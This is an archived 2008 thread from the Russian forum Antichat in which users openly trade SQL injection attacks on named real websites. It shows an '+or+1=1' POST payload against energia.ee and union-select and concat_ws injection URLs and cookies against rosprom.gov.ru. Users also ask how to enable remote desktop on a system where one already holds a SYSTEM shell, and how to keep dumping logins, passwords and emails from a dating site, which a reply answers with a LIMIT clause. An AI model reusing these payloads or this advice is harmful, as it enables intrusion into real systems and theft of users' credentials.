ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
30.04.2008, 17:16
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
POST /index.php?id=211 HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.energia.ee
Content-Length: 282
Connection: Close
Pragma: no-cache
Acunetix-Product: WVS/5.5 (Acunetix Web Vulnerability Scanner - NORMAL)
Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED
Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm
html_enabled=1&subject=Elektritarne%20pakkumine%20 L%C3%A4tis%20v%C3%B5i%20Leedus&locationData=979%3A tt_content%3A3514&Ettev%C3%B5te="+or+1%3D1+--+&Kontaktisik=111-222-1933email@address.tst&Telefon=111-222-1933email@address.tst&Epost=111-222-1933email@address.tst&formtype_mail=Saada
Орёт,что скуля. Пробывал постами меняя параметры заставить отреагировать серв,но ему поф даже на 1+and+0=0 и 1+and+1=1
Менял параметры, как только мог. Есть тут инжект или нету?
|
|
|
30.04.2008, 17:36
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
но ему поф даже на 1+and+0=0 и 1+and+1=1
Что ты хотел этим сказать? 0_о
|
|
|
|
30.04.2008, 18:21
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Сообщение от n0ne
Что ты хотел этим сказать? 0_о
моя хотело сказать,что ему абсолютно ПОФ,тобишь он возвращает одинаковый результат,обрезает чели,потому что при смени ид меняется только страница )),а запросы он как будто ваще не видит: )
|
|
|
|
30.04.2008, 18:45
|
|
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
Провел на форуме:
380957
Репутация:
56
|
|
по моему правильнее было так сделать =1+1 или =2-1 если страница та же то инжекта нет...
|
|
|
|
30.04.2008, 19:19
|
|
Banned
Регистрация: 24.04.2008
Сообщений: 10
Провел на форуме:
36377
Репутация:
6
|
|
при подключение через mstsc.exe пишет Эудалённые подключения запрещены"
как запустить? есть шелл на удалённой системе к которой произвожу коннэкт.
права system
|
|
|
|
30.04.2008, 19:33
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
Велемир, а ты не думал, что 0 всегда равен нулю, как и 1 всегда будет равна самой себе?)) ты бы попробовал 1=2 и делал выводы. Ещё попробуй к id -1 подставлять и т.п.
|
|
|
|
30.04.2008, 19:35
|
|
Участник форума
Регистрация: 08.11.2007
Сообщений: 102
Провел на форуме:
1266776
Репутация:
93
|
|
http://www.rosprom.gov.ru/oorg.php?id=-13+or+1=concat_ws(0x2,user(),database(),version())--
Я так понял, что с этого ничего нельзя поиметь?
|
|
|
|
30.04.2008, 20:03
|
|
Новичок
Регистрация: 07.04.2008
Сообщений: 1
Провел на форуме:
17562
Репутация:
0
|
|
всем привет
частенько сталкиваюсь с извлечением большого количество данных из баз данных.
можно ли как-нибудь начать извлекать данные начиная к примеру с 20.000'ой записи?
К примеру:
Имеем дейтинг-сайт с логинами/пассами/мылами на 20к пользователей. В месяц региться ещё порядка 1к. Можно ли определённым запросом вывести на эран инфу начиная с 20.000? Чтобы не качать заново всю информацию полностью?
Спасибо всем ответившим =)
|
|
|
|
30.04.2008, 20:05
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
.acme
при обращении к скрипту http://www.rosprom.gov.ru/oorg.php
в куки прописывай id=-999 union select 1,2,3,4,5/*
__________________
Карфаген должен быть разрушен...
|
|
|
|
30.04.2008, 20:07
|
|
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753
Репутация:
120
|
|
Сообщение от Indio
всем привет
частенько сталкиваюсь с извлечением большого количество данных из баз данных.
можно ли как-нибудь начать извлекать данные начиная к примеру с 20.000'ой записи?
К примеру:
Имеем дейтинг-сайт с логинами/пассами/мылами на 20к пользователей. В месяц региться ещё порядка 1к. Можно ли определённым запросом вывести на эран инфу начиная с 20.000? Чтобы не качать заново всю информацию полностью?
Спасибо всем ответившим =)
Пользуйся лимитом (LIMIT 20000,100) к примеру
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
